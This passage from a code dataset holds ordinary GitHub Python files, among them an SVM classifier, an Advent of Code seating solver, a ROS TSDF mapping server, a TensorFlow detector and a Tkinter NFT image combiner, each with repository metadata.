room.save()\n\n return Response(status=200, data=response)\n\n else:\n return Response(status=400, data=response.content)\n","repo_name":"sterenczak-marek/awesomegame-panel","sub_path":"api/room/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18087002240","text":"import sys\nimport tqdm\nimport matplotlib.pyplot as plt\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.metrics import accuracy_score\n\n\nclass SVM:\n \"\"\"Class for SVM\"\"\"\n\n def __init__(self, X_train, y_train, X_test, y_test, kernel) -> None:\n self.X_train = X_train\n self.y_train = y_train\n self.X_test = X_test\n self.y_test = y_test\n self.regularization = [0.25, 0.5, 0.75, 1.0]\n self.accuracy_list = []\n if kernel != \"Linear\" and kernel != \"Polynomial\" and kernel != \"RBF\":\n sys.exit(\"!!!Please provide valid kernal!!!\")\n self.kernel = kernel\n\n def svm(self):\n print(\"Kernel: \", self.kernel)\n if self.kernel == \"Linear\":\n for _c in tqdm.tqdm(self.regularization):\n self.linear_svm(_c)\n elif self.kernel == \"Polynomial\" or self.kernel == \"RBF\":\n for _c in tqdm.tqdm(self.regularization):\n self.kernel_svm(_c)\n\n def linear_svm(self, _c):\n \"\"\"Function to perform Linear SVM\n\n Args:\n _c (Float): Regularization parameter\n \"\"\"\n model = LinearSVC(\n C=_c,\n loss='hinge',\n multi_class=\"crammer_singer\",\n penalty='l2',\n random_state=None)\n model.fit(self.X_train, self.y_train)\n pred_train = model.predict(self.X_train)\n pred_test = model.predict(self.X_test)\n model_acc = accuracy_score(self.y_train, pred_train)\n test_acc = accuracy_score(self.y_test, pred_test)\n self.accuracy_list.append(model_acc)\n print(\n f\"Regularization : {_c} Test Accuracy : {test_acc:.4f} Training Accuracy : {model_acc:.4f}\")\n\n def kernel_svm(self, _c):\n \"\"\"Function to perform kernel SVM\n\n Args:\n _c (Float): Regularization parameter\n \"\"\"\n if self.kernel == \"Polynomial\":\n model = SVC(kernel='poly', degree=2, gamma='auto', coef0=1, C=_c)\n model.fit(self.X_train, self.y_train)\n pred_train = model.predict(self.X_train)\n pred_test = model.predict(self.X_test)\n model_acc = accuracy_score(self.y_train, pred_train)\n test_acc = accuracy_score(self.y_test, pred_test)\n self.accuracy_list.append(model_acc)\n print(\n f\"Regularization : {_c} Test Accuracy : {test_acc:.4f} Training Accuracy : {model_acc:.4f}\")\n\n else:\n model = SVC(kernel='rbf', gamma=\"auto\", C=_c)\n model.fit(self.X_train, self.y_train)\n pred_train = model.predict(self.X_train)\n pred_test = model.predict(self.X_test)\n model_acc = accuracy_score(self.y_train, pred_train)\n test_acc = accuracy_score(self.y_test, pred_test)\n self.accuracy_list.append(model_acc)\n print(\n f\"Regularization : {_c} Test Accuracy : {test_acc:.4f} Training Accuracy : {model_acc:.4f}\")\n\n def plot(self):\n \"\"\"Function to plot the results\n \"\"\"\n plt.figure(1)\n plt.plot(self.regularization, self.accuracy_list)\n plt.title(\"Accuracy wrt c\")\n plt.xlabel(\"Regularization\")\n plt.ylabel(\"Accuracy\")\n plt.show()\n","repo_name":"prat1kbhujbal/Handwritten-digits-Classification","sub_path":"Code/SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36436065071","text":"import numpy as np\nimport numpy.testing as npt\nfrom neurodamus.gap_junction import GapJunctionSynapseReader\nfrom pathlib import Path\n\nSIM_DIR = Path(__file__).parent.parent.absolute() / \"simulations\"\n\n\ndef test_gapjunction_synreaderNRN():\n nrn_file = \"/gpfs/bbp.cscs.ch/project/proj12/jenkins/cellular/circuit-scx-v5-gapjunctions/gap_junctions/nrn_gj.h5\" # noqa\n nrn_reader = GapJunctionSynapseReader.create(nrn_file, 1)\n syn_params_nrn = nrn_reader._load_synapse_parameters(100124)\n # check reading of sgid, junction_id_pre and junction_id_post\n ref_sgids = np.array([94669., 94723., 95634., 95823., 96581.,\n 97338., 97455., 98139., 98432., 100725.,\n 101360., 101506., 101696., 101696., 191567.])\n ref_junction_id_pre = np.array([735., 736., 29., 36., 51.,\n 77., 744., 134., 148., 286.,\n 322., 337., 355., 356., 681.])\n ref_junction_id_post = np.array([1251., 1259., 617., 1354., 1002.,\n 1756., 1027., 924., 709., 624.,\n 1050., 521., 592., 593., 590.])\n npt.assert_allclose(syn_params_nrn.sgid, ref_sgids)\n npt.assert_allclose(syn_params_nrn.D, ref_junction_id_pre)\n npt.assert_allclose(syn_params_nrn.F, ref_junction_id_post)\n\n\ndef test_gapjunction_sonata_reader():\n sonata_file = str(SIM_DIR / \"mini_thalamus_sonata/gapjunction/edges.h5\")\n sonata_reader = GapJunctionSynapseReader.create(sonata_file, 1)\n syn_params_sonata = sonata_reader._load_synapse_parameters(1)\n ref_junction_id_pre = np.array([10257., 43930., 226003., 298841., 324744.,\n 1094745., 1167632., 1172523., 1260104.])\n ref_junction_id_post = np.array([14., 52., 71., 76., 78., 84., 89., 90., 93.])\n ref_weight = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2])\n npt.assert_allclose(syn_params_sonata.D, ref_junction_id_pre)\n npt.assert_allclose(syn_params_sonata.F, ref_junction_id_post)\n npt.assert_allclose(syn_params_sonata.weight, ref_weight)\n","repo_name":"BlueBrain/neurodamus","sub_path":"tests/integration-e2e/test_synapse_reader.py","file_name":"test_synapse_reader.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"6945016722","text":"'''\n Programa: gerador.py\n Função: Gerar uma sequência de retângulos identificados pelas suas coordenadas\n do canto superior esquerdo (x_se, y_se) e do canto inferior direito\n (x_id, y_id). Os valores do tamanho da base e da altura, bem como o\n total de pontos a serem gerados são passados como parâmetros por\n linha de comando.\n Uso: python gerador.py \nProgramador: Amaury Antônio de Castro Junior\n Data: 29/5/2022.\n'''\n\n# Módulos usados para gerar números aleatórios e permitir a passagem de\n# parâmtros por linha de comando.\nimport random\nimport sys\n\n# Armazena os valores de e passados por linha de comando.\nbase = int(sys.argv[1])\naltura = int(sys.argv[2])\n\n# Armazena o valor da quantidade de areas a serem lidas, passado por linha\n# de comando\nnum_areas = int(sys.argv[3])\n\n# Inicializa os valores das coordenadas que identificam uma área\nx_se = y_se = x_id = y_id = 0\n\n# Inicializa o valor de áreas válidas. As áreas válidas devem possuem\n# coordenadas (x_se, y_se) e (x_id, y_id), tal que (x_se < y_id) E (y_se > y_id)\nareas_validas = 0\n\n# Laço para geração dos valores das coordenadas que identificam as áreas\n# Devem ser geradas coordenadas.\nwhile areas_validas < num_areas:\n\n # Geração aleatória dos valores das coordenadas\n x_se = random.randint(0,base)\n y_se = random.randint(0,altura)\n x_id = random.randint(0,base)\n y_id = random.randint(0,altura)\n\n # Verifica se as coordenadas geradas são válidas, de acordo com os\n # critérios de entrada definidos para o projeto.\n if (x_se < x_id and y_se > y_id):\n\n # Se forem válidas, imprime as coordenadas e incrementa o contador\n # de áreas válidas\n print(\"%i %i %i %i\"%(x_se,y_se,x_id,y_id))\n areas_validas += 1\n\n \n","repo_name":"Gefft3/MosaicoImagensSatelite","sub_path":"mosaico/gerador.py","file_name":"gerador.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74364314133","text":"\"\"\" \nAuthor: Darren\nDate: 12/02/2021\n\nSolving https://adventofcode.com/2015/day/13\n\nA list of people sat around the table.\nHappiness scores depend on who sets next to whom. E.g.\n Alice would gain 54 happiness units by sitting next to Bob.\n\nSolution:\n Use a defaultdict to store happiness scores each person. E.g.\n happiness[Alice][Bob] = 54\n \n Use a set to store all people.\n Find all permutations of people around the table using itertools.permutations().\n Create a dict happiness_for_perms\n For each perm:\n We don't want to process reverse order of perms, so check using <= vs last element\n For each person around the table clockwise:\n Add up the happiness of the adjacent people\n Store happiness for this perm\n\nPart 1:\n Find happiness of optimal seating arrangement\n\nPart 2:\n Add myself, and assume that all happiness relationships are 0, wherever I go.\n \n Add myself to the dict for every other person in the set.\n Add me to the set.\n Repeat Part 1.\n\"\"\"\nimport os\nimport time\nimport re\nfrom itertools import permutations\nfrom collections import defaultdict\n\nSCRIPT_DIR = os.path.dirname(__file__) \nINPUT_FILE = \"input/input.txt\"\n# INPUT_FILE = \"input/sample_input.txt\"\n\ndef main():\n input_file = os.path.join(SCRIPT_DIR, INPUT_FILE)\n with open(input_file, mode=\"rt\") as f:\n data = f.read().splitlines()\n\n print(\"Part 1\")\n # build up a dict of hapiness scores for each person\n happiness_by_person = get_happiness_by_person(data)\n\n # create a set of all the people\n people = set(happiness_by_person.keys())\n\n # we don't care where the first person sits, since it's a circle. \n # So let's just make person_1 the 'head' of the table\n person_1 = people.pop()\n\n # get all permutations for remaining people around the table, as list of tuples\n # We expect n! perms\n happiness_for_perm, optimum_happiness_perm = find_optimum_happiness(happiness_by_person, person_1, people)\n print(f\"Optimum happiness = {happiness_for_perm[optimum_happiness_perm]} with seating: {optimum_happiness_perm}\")\n\n print(\"\\nPart 2\")\n # Need to add person_1 back in, so that we can add values for Me sitting next to Person_1\n people.add(person_1)\n add_me_to_happiness_by_person(happiness_by_person, people)\n people.remove(person_1)\n people.add('Me')\n\n happiness_for_perm, optimum_happiness_perm = find_optimum_happiness(happiness_by_person, person_1, people)\n print(f\"Optimum happiness = {happiness_for_perm[optimum_happiness_perm]} with seating: {optimum_happiness_perm}\")\n\ndef find_optimum_happiness(happiness_by_person, person_1, people):\n \"\"\" Determine all permutations of seating.\n Reduce number of perms by removing person_1.\n Compute happiness score for each permutation.\n Determine the permutation with the greatest happiness score.\n\n Args:\n happiness_by_person (dict): Happiness adjacency map\n person_1 (str): Arbitrary head of the table\n people (set): The people to seat around the table\n\n Returns:\n tuple: (score, optimum_seating_permutation)\n \"\"\"\n perms = list(permutations(people))\n happiness_for_perm = {}\n for perm in perms:\n # this allows us to remove reverse permutations\n if perm <= perm[::-1]:\n perm = list(perm) # convert perm from tuple to list, to make it mutable\n perm.insert(0, person_1) # such that we can insert the head of the table\n happiness_for_perm[tuple(perm)] = compute_happiness_for_perm(perm, happiness_by_person)\n \n optimum_happiness_perm = max(happiness_for_perm.items(), key=lambda x: x[1])[0]\n return happiness_for_perm, optimum_happiness_perm\n\ndef add_me_to_happiness_by_person(happiness_by_person: dict, people):\n for person in people:\n happiness_by_person[person]['Me'] = 0\n happiness_by_person['Me'][person] = 0\n\ndef compute_happiness_for_perm(seating_arrangement, happiness_by_person):\n happiness = 0\n\n for i, current_person in enumerate(seating_arrangement):\n if i < len(seating_arrangement) - 1:\n current_next_person = seating_arrangement[i+1]\n else:\n current_next_person = seating_arrangement[0]\n\n happiness += happiness_by_person[current_person][current_next_person]\n happiness += happiness_by_person[current_next_person][current_person]\n\n return happiness\n\ndef get_happiness_by_person(data) -> dict[str, dict[str, int]]:\n \"\"\" Here we build an adjacency list.\n We will map each person to every other person.\n Since this is a directed graph, we'll use a defaultdict(dict).\n\n Args:\n data (list): A list of happiness statements\n\n Returns:\n dict: dict[person_x][person_y: happiness]\n \"\"\"\n # Alice would gain 54 happiness units by sitting next to Bob.\n happiness = defaultdict(dict)\n happiness_pattern = re.compile(r\"^(\\w+) would (\\w+) (\\d+) happiness units by sitting next to (\\w+)\")\n \n for line in data:\n person_1, gain_or_lose, value, person_2 = happiness_pattern.findall(line)[0]\n if gain_or_lose == \"gain\":\n value = int(value)\n else:\n value = -(int(value))\n \n happiness[person_1][person_2] = value\n\n return happiness\n\nif __name__ == \"__main__\":\n t1 = time.perf_counter()\n main()\n t2 = time.perf_counter()\n print(f\"Execution time: {t2 - t1:0.4f} seconds\")\n","repo_name":"derailed-dash/Advent-of-Code","sub_path":"src/AoC_2015/d13_seating_arrangement_with_circular_set_and_perms/happy_seating.py","file_name":"happy_seating.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"67"} +{"seq_id":"3616383893","text":"import sys\nimport os.path\nsys.path.append(\n os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\nimport ytDownloader\nimport Utils\nimport ytURL\n\ndef set_ytd():\n utils=Utils.Utils()\n yturl=ytURL.ytURL()\n ytdownloader=ytDownloader.ytDownloader(utils=utils,ytURL=yturl)\n return ytdownloader,utils,yturl\n\n\ndef test_setters(url = None):\n if url is None:\n url='https://www.youtube.com/watch?v=GQ-k8i7qkMw&ab_channel=KinoCheck.com'\n ytdownloader,utils,yturl=set_ytd()\n yturl.url=url\n print(yturl.vid_url)\n print(yturl.channel)\n print(yturl.channel_url)\n print(yturl.url_d)\n \n \n \n\n \n \nif __name__=='__main__':\n test_setters()\n# test_parse_url(url='https://www.youtube.com/@KinoCheck.com')","repo_name":"pawelofficial/yt-tts","sub_path":"src3/tests/ytURL_tests.py","file_name":"ytURL_tests.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17859315193","text":"import random\nfrom gameObjects.League import \\\n save_league, load_league\n\n\ndef print_menu():\n print(\"--------------------\\nMenu\\n--------------------\\n\")\n print(\"1 - Start New League\")\n print(\"2 - Schedule\")\n print(\"3 - Standings\")\n print(\"4 - Play Game\")\n print(\"5 - Team Stats\")\n print(\"6 - Edit Roster\")\n print(\"7 - Quit\")\n return int(input(\"\"))\n\n\ndef display_offenses(all_teams):\n print(\"-----------------------\")\n print(\"Team\\t\\t\\tW\\tL\")\n print(\"-----------------------\")\n\n sorted_teams = sorted(all_teams, key=lambda x: (-x.calculate_ppg()))\n for team in sorted_teams:\n print('{0:15} {1:3.2f}'.format(team.college, team.calculate_ppg()))\n\n\ndef display_defenses(all_teams):\n print(\"-----------------------\")\n print(\"Team\\t\\t\\tW\\tL\")\n print(\"-----------------------\")\n\n sorted_teams = sorted(all_teams, key=lambda x: (x.calculate_oppg()))\n for team in sorted_teams:\n print('{0:15} {1:3.2f}'.format(team.college, team.calculate_oppg()))\n\n\ndef show_roster(active_team):\n print(f\"\\n{active_team.college} {active_team.nickname}' Roster:\")\n n = 0\n for athlete in active_team.roster:\n print(f\"{n} - {athlete.display_name()}\")\n n += 1\n\n\ndef edit_player(active_team, val):\n player_to_edit = active_team.roster[val]\n player_name = input(\"Enter player's new name: \")\n if player_name == '0':\n active_team.roster.remove(player_to_edit)\n else:\n name = player_name.split(', ')\n player_to_edit.edit_name(name[0], name[1])\n print()\n\n\ndef edit_roster(active_team):\n done = False\n while not done:\n show_roster(active_team)\n player_name = input(\"Player's Name or Press q to quit: \")\n try:\n val = int(player_name)\n if val < len(active_team.roster):\n edit_player(active_team, val)\n else:\n print(\"That player is not on the roster\")\n except ValueError:\n if player_name == 'q' or player_name == 'Q':\n done = True\n elif active_team.is_player_on_roster(player_name):\n print(\"That player is already on the roster\")\n else:\n name = player_name.split(', ')\n active_team.add_player_to_roster(name[0], name[1])\n\n\nif __name__ == \"__main__\":\n ncaa = load_league()\n\n menu_choice = 0\n\n while menu_choice != 7:\n menu_choice = print_menu()\n if menu_choice == 1:\n ncaa.start_a_new_league(\"team_list.csv\")\n elif menu_choice == 2:\n for group in ncaa.conferences:\n group.display_schedule()\n print(\"\\n\\n\")\n elif menu_choice == 3:\n for group in ncaa.conferences:\n group.display_standings()\n print(\"\\n\\n\")\n elif menu_choice == 4:\n input_choice = \"Y\"\n while input_choice == \"Y\":\n activeLeague = random.choice(ncaa.conferences)\n activeLeague.play_next_game()\n print(\"\\n\")\n input_choice = str.capitalize(input(\"Play another game? \"))\n elif menu_choice == 5:\n input_choice = input(\"Sort teams by offense (O) or defense (D)\").upper()\n if input_choice == 'O':\n display_offenses(ncaa.team_list)\n elif input_choice == 'D':\n display_defenses(ncaa.team_list)\n else:\n print(\"Not a valid selection -- \")\n elif menu_choice == 6:\n counter = 0\n for college in ncaa.team_list:\n print(f\"{counter} - {college.college} {college.nickname}\")\n counter += 1\n team_choice = int(input(\"Please choose the number of the team you would like to edit: \"))\n if team_choice < len(ncaa.team_list):\n team_to_edit = ncaa.team_list[team_choice]\n edit_roster(team_to_edit)\n else:\n print(\"That choice is out of range!\\n\")\n elif menu_choice == 7:\n pass\n else:\n print(\"Not a viable choice\")\n\n save_league(ncaa)\n","repo_name":"Kevbly13/College_Basketball","sub_path":"Scheduler.py","file_name":"Scheduler.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74602373973","text":"import pytest\nfrom pathlib import Path\nfrom click.testing import CliRunner\n\nfrom scripts.sars_cov_2.extract_typing_data import extract_typing_data\nfrom scripts.util.data_loading import load_yaml\n\n\n@pytest.mark.jira(identifier=\"84e2a22c-3be7-4ac0-9418-e9e5f5a90790\", confirms=\"PSG-3621\")\ndef test_extract_typing_data(tmp_path: Path, typing_data_path: Path, variant_definitions_data_path: Path):\n\n output_yaml_path = tmp_path / \"definitions.yaml\"\n expected_output_yaml_path = typing_data_path / \"expected_sars_cov_2_types.yaml\"\n\n rv = CliRunner().invoke(\n extract_typing_data,\n [\n \"--yaml-input-dir\",\n variant_definitions_data_path,\n \"--output-yaml-file\",\n output_yaml_path,\n ],\n )\n assert rv.exit_code == 0\n assert load_yaml(output_yaml_path) == load_yaml(expected_output_yaml_path)\n","repo_name":"Congenica/psga-pipeline-sars-cov-2","sub_path":"tests/sars_cov_2/test_extract_typing_data.py","file_name":"test_extract_typing_data.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"10927443360","text":"#!/usr/bin/env python3\n\nimport cv_bridge\nimport rospy\nfrom sensor_msgs.msg import CameraInfo, Image, PointCloud2\nimport std_srvs.srv\n\nfrom robot_helpers.spatial import Transform\nfrom robot_helpers.ros import tf\nfrom robot_helpers.ros.conversions import *\nfrom vgn.perception import UniformTSDFVolume\nimport vgn.srv\nfrom vgn.utils import *\n\n\nclass UniformTSDFServer:\n def __init__(self):\n print(\"Initializing TSDF Server\")\n self.load_parameters()\n tf.init()\n self.init_topics()\n self.advertise_services()\n self.cv_bridge = cv_bridge.CvBridge()\n self.integrate = False\n print(\"TSDF server ready\")\n # pub_topics = rospy.get_published_topics()\n # print(f\"Publishing to: {pub_topics}\")\n\n def load_parameters(self):\n # self.frame_id = rospy.get_param(\"~frame_id\")\n print(\"Initializing TSDF Server\")\n self.base_frame_id = rospy.get_param(\"~base_frame_id\")\n self.frame_id = rospy.get_param(\"~frame_id\")\n self.length = rospy.get_param(\"~length\")\n self.resolution = rospy.get_param(\"~resolution\")\n self.depth_scaling = rospy.get_param(\"~depth_scaling\")\n self.cam_frame_id = rospy.get_param(\"~camera/frame_id\")\n info_topic = rospy.get_param(\"~camera/info_topic\")\n self.depth_topic = rospy.get_param(\"~camera/depth_topic\")\n print('before wait')\n msg = rospy.wait_for_message(info_topic, CameraInfo)\n print('after wait')\n self.intrinsic = from_camera_info_msg(msg)\n center = np.r_[0.5, 0.0, 0.2]\n length = 0.3\n xyz = center - np.r_[0.5 * length, 0.5 * length, 0.0]\n self.T_base_task = Transform.from_translation(xyz)\n\n def init_topics(self):\n print('Init topic')\n self.scene_cloud_pub = rospy.Publisher(\"/tsdf_server/scene_cloud\", PointCloud2, queue_size=1)\n self.map_cloud_pub = rospy.Publisher(\"map_cloud\", PointCloud2, queue_size=1)\n rospy.Subscriber(self.depth_topic, Image, self.sensor_cb)\n\n def advertise_services(self):\n rospy.Service(\"reset_map\", std_srvs.srv.Empty, self.reset)\n rospy.Service(\"toggle_integration\", std_srvs.srv.SetBool, self.toggle)\n rospy.Service(\"get_scene_cloud\", vgn.srv.GetSceneCloud, self.get_scene_cloud)\n rospy.Service(\"get_map_cloud\", vgn.srv.GetMapCloud, self.get_map_cloud)\n\n def reset(self, req):\n self.tsdf = UniformTSDFVolume(self.length, self.resolution)\n return std_srvs.srv.EmptyResponse()\n\n def toggle(self, req):\n self.integrate = req.data\n return std_srvs.srv.SetBoolResponse(success=True)\n\n def sensor_cb(self, msg):\n # print('tsdf integration step -------------------')\n if self.integrate:\n depth = (\n self.cv_bridge.imgmsg_to_cv2(msg).astype(np.float32)\n * self.depth_scaling\n )\n extrinsic = tf.lookup(\n self.cam_frame_id, self.base_frame_id, msg.header.stamp, rospy.Duration(0.1) # was 0.1\n )\n self.tsdf.integrate(depth, self.intrinsic, extrinsic * self.T_base_task)\n\n # self.get_map_cloud(vgn.srv.GetMapCloud)\n\n def get_scene_cloud(self, req):\n scene_cloud = self.tsdf.get_scene_cloud()\n points = np.asarray(scene_cloud.points)\n msg = to_cloud_msg(self.frame_id, points)\n self.scene_cloud_pub.publish(msg)\n res = vgn.srv.GetSceneCloudResponse()\n res.scene_cloud = msg\n return res\n\n def get_map_cloud(self, req):\n map_cloud = self.tsdf.get_map_cloud()\n points = np.asarray(map_cloud.points)\n distances = np.asarray(map_cloud.colors)[:, [0]]\n msg = to_cloud_msg(self.frame_id, points, distances=distances)\n self.map_cloud_pub.publish(msg)\n res = vgn.srv.GetMapCloudResponse()\n res.voxel_size = self.tsdf.voxel_size\n res.map_cloud = msg\n return res\n\n\nif __name__ == \"__main__\":\n rospy.init_node(\"tsdf_server\")\n UniformTSDFServer()\n rospy.spin()\n # server.run()\n","repo_name":"Pitcherrr/active_search","sub_path":"src/active_search/nodes/tsdf_server.py","file_name":"tsdf_server.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72781577493","text":"import tensorflow as tf\nimport config\nimport numpy as np\n\n\nclass DetectionObject:\n def __init__(self, left, top, right, bottom, class_id, probability):\n self.left = left\n self.top = top\n self.right = right\n self.bottom = bottom\n self.class_id = class_id\n self.probability = probability\n\n\nclass Detector:\n def __init__(self):\n self.g = None\n self.session = None\n self.image_tensor = None\n self.detection_boxes = None\n self.detection_scores = None\n self.detection_classes = None\n self.num_detections = None\n\n def load(self, graph_file_path):\n ret = False\n\n detection_graph = tf.Graph()\n with detection_graph.as_default():\n\n # GraphDef can load serialzied graph, such as pretrained model data.\n # We import specified graph here with tf.import_graph_def function.\n graph_def = tf.GraphDef()\n with tf.gfile.GFile(graph_file_path, 'rb') as fid:\n serialized_graph = fid.read()\n graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(graph_def, name='')\n\n self.session = tf.Session(graph=detection_graph) \n self.image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n self.detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n self.detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n self.detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n self.num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n ret = True\n\n return ret\n\n def detect(self, image):\n height, width, depth = image.shape\n image_np_expanded = np.expand_dims(image, axis=0)\n\n param_array = [\n self.detection_boxes,\n self.detection_scores,\n self.detection_classes,\n self.num_detections\n ]\n (boxes, scores, classes, num) = self.session.run(param_array, feed_dict={self.image_tensor: image_np_expanded})\n\n objects = []\n\n idx = 0\n for score in scores[0]:\n if score > config.CONFIDENCE:\n class_id = classes[0][idx]\n if class_id == config.TARGET_CLASS:\n ymin = boxes[0][idx][0]\n xmin = boxes[0][idx][1]\n ymax = boxes[0][idx][2]\n xmax = boxes[0][idx][3]\n\n (left, top, right, bottom) = (\n int(xmin * width), \n int(ymin * height), \n int(xmax * width),\n int(ymax * height)\n )\n\n objects.append(DetectionObject(left, top, right, bottom, class_id, score))\n idx += 1\n else:\n pass\n else:\n break\n\n if config.VERBOSE_LOG:\n for obj in objects:\n print(f\"({obj.left}, {obj.top}), ({obj.right}, {obj.bottom}), class : {obj.class_id}, probability : {obj.probability}\")\n\n return objects\n","repo_name":"yukihirokatagiri/track","sub_path":"core/detection_graph.py","file_name":"detection_graph.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22644332921","text":"#!/usr/bin/env python\nimport argparse\nimport chainer\nimport time\nimport chainer.links as L\nfrom chainer import training\nfrom chainer.training import extensions\nfrom chainer.datasets import get_cifar10\nimport chainermn\nimport numpy as np\n\nfrom models.alexnet_model_parallel import AlexNet\nfrom config import config\n\n\n\ndef main():\n comm = chainermn.create_communicator(\"naive\")\n\n parser = argparse.ArgumentParser(description='Chainer example: MNIST')\n parser.add_argument('--device', '-d', type=str, default='-1',\n help='Device specifier. Either ChainerX device '\n 'specifier or an integer. If non-negative integer, '\n 'CuPy arrays with specified device id are used. If '\n 'negative integer, NumPy arrays are used')\n parser.add_argument('--snapshot', '-s',\n default='result/snapshot_iter_12000',\n help='The path to a saved snapshot (NPZ)')\n parser.add_argument('--unit', '-u', type=int, default=1000,\n help='Number of units')\n group = parser.add_argument_group('deprecated arguments')\n group.add_argument('--gpu', '-g', dest='device',\n type=int, nargs='?', const=0,\n help='GPU ID (negative value indicates CPU)')\n args = parser.parse_args()\n\n device = chainer.get_device(args.device)\n\n print('Device: {}'.format(device))\n print('# unit: {}'.format(args.unit))\n print('')\n\n device.use()\n\n # Create a same model object as what you used for training\n model = AlexNet(comm, num_classes=10)\n optimizer = chainer.optimizers.MomentumSGD(0.001)\n optimizer.setup(model)\n\n # # Load saved parameters from a NPZ file of the Trainer object\n # try:\n # chainer.serializers.load_npz(\n # \"result/snapshot_iter_12000\", model, path='updater/model:main/predictor/')\n # except Exception:\n # chainer.serializers.load_npz(\n # args.snapshot, model, path='predictor/')\n\n #model.to_device(device)\n\n # Prepare data\n train, test = get_cifar10()\n x = test.__getitem__(0)[0]\n x = np.expand_dims(x, axis=0)\n print(x.shape)\n with chainer.using_config('train', False):\n prediction = model.forward(x)\n\n print('Prediction:', prediction)\n #print('Answer:', answer)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ankahira/PyPi","sub_path":"chainer/inference_cifar.py","file_name":"inference_cifar.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8601809235","text":"# Imports PIL module\r\n\r\nimport os\r\nimport itertools\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog as fd\r\nfrom PIL import Image\r\n\r\n#File location naming\r\nclass ing:\r\n def __init__(self):\r\n self.pen = \"\"\r\n def select_file(self):\r\n self.pen = (fd.askdirectory(title='Choose a file'))\r\n \r\n\r\n#ends program without printing\r\ndef end():\r\n exit(1)\r\n\r\n\r\n#The file locations of the three parts to an NFT: background, base image, components\r\n#Background\r\nblap = ing()\r\n#Base\r\nblap2 = ing()\r\n#Components\r\nblap3 = ing()\r\n\r\n#Create and format the GUI\r\nroot = Tk()\r\nroot.title(\"Nft Printer\")\r\nfrm = ttk.Frame(root, padding=10)\r\nfrm.grid()\r\n\r\n#Button implementation\r\n\r\n#Sets Background\r\nttk.Button(frm, text=\"Background\", command = blap.select_file).grid(column=1, row=0)\r\n#Sets Base\r\nttk.Button(frm, text=\"Base\", command = blap2.select_file).grid(column=2, row=0)\r\n#Sets Components\r\nttk.Button(frm, text=\"Components\", command = blap3.select_file).grid(column=3, row=0)\r\n#Ends program and does not print\r\nttk.Button(frm, text=\"Quit\", command = end).grid(column=2, row=2)\r\n#Ends the GUI and prints\r\nttk.Button(frm, text=\"Execute\", command = root.destroy).grid(column=2, row=1)\r\n#Gives a preview of what the images will look like\r\n\r\n\r\n#Loops until the GUI is executed\r\nroot.mainloop()\r\n\r\n\r\ncomponentList =[]\r\nfor x in os.listdir(blap3.pen):\r\n newlist = []\r\n for y in os.listdir(blap3.pen + chr(92) + x):\r\n newlist.append(blap3.pen +chr(92)+ x +chr(92) + y)\r\n componentList.append(newlist)\r\n\r\n#Create the list for background images and base images\r\nbaseList = os.listdir(blap2.pen)\r\nbackgroundList = os.listdir(blap.pen)\r\n\r\n#Contains a list of lists each with the directory for each of the combinations of components\r\nImgList = list(itertools.product(backgroundList, baseList, *componentList))\r\n\r\n\r\n#prints The NFTs\r\nfor i in list(ImgList):\r\n\r\n background = Image.open((blap.pen+chr(92) + i[0]), mode='r')\r\n base = Image.open((blap2.pen+chr(92) + i[1]), mode='r')\r\n background.paste(base, base)\r\n for x in range(2,(len(i))):\r\n comp = Image.open((i[x]), mode='r')\r\n background.paste(comp,comp)\r\n background.show()\r\n\r\nexit(1)\r\n","repo_name":"IneedtoGitaJob/Nft","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23520691952","text":"import argparse\nimport os\nfrom glob import glob\n \nimport torch\nimport torch.backends.cudnn as cudnn\nimport yaml\nimport numpy as np \nimport torchvision.transforms as transforms \nfrom tqdm import tqdm\n\nimport archs\nfrom dataset import Dataset\nfrom metrics import dice_coef, Jaccord, HD, ASD\n#from utils import AverageMeter\nfrom collections import OrderedDict\nfrom utils import test_single_case, AverageMeter \n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--model_dir', default='/raid/D/bayes/bayes_AtriaSeg_8/',\n help='model directory')\n parser.add_argument('--input_crop', default=128, type=int,\n help='image width')\n parser.add_argument('--depth', default=32, type=int,\n help='image depth')\n parser.add_argument('--test_txt', default='./val_AtriaSeg.txt',\n help='text file showing the patient id used for validation')\n 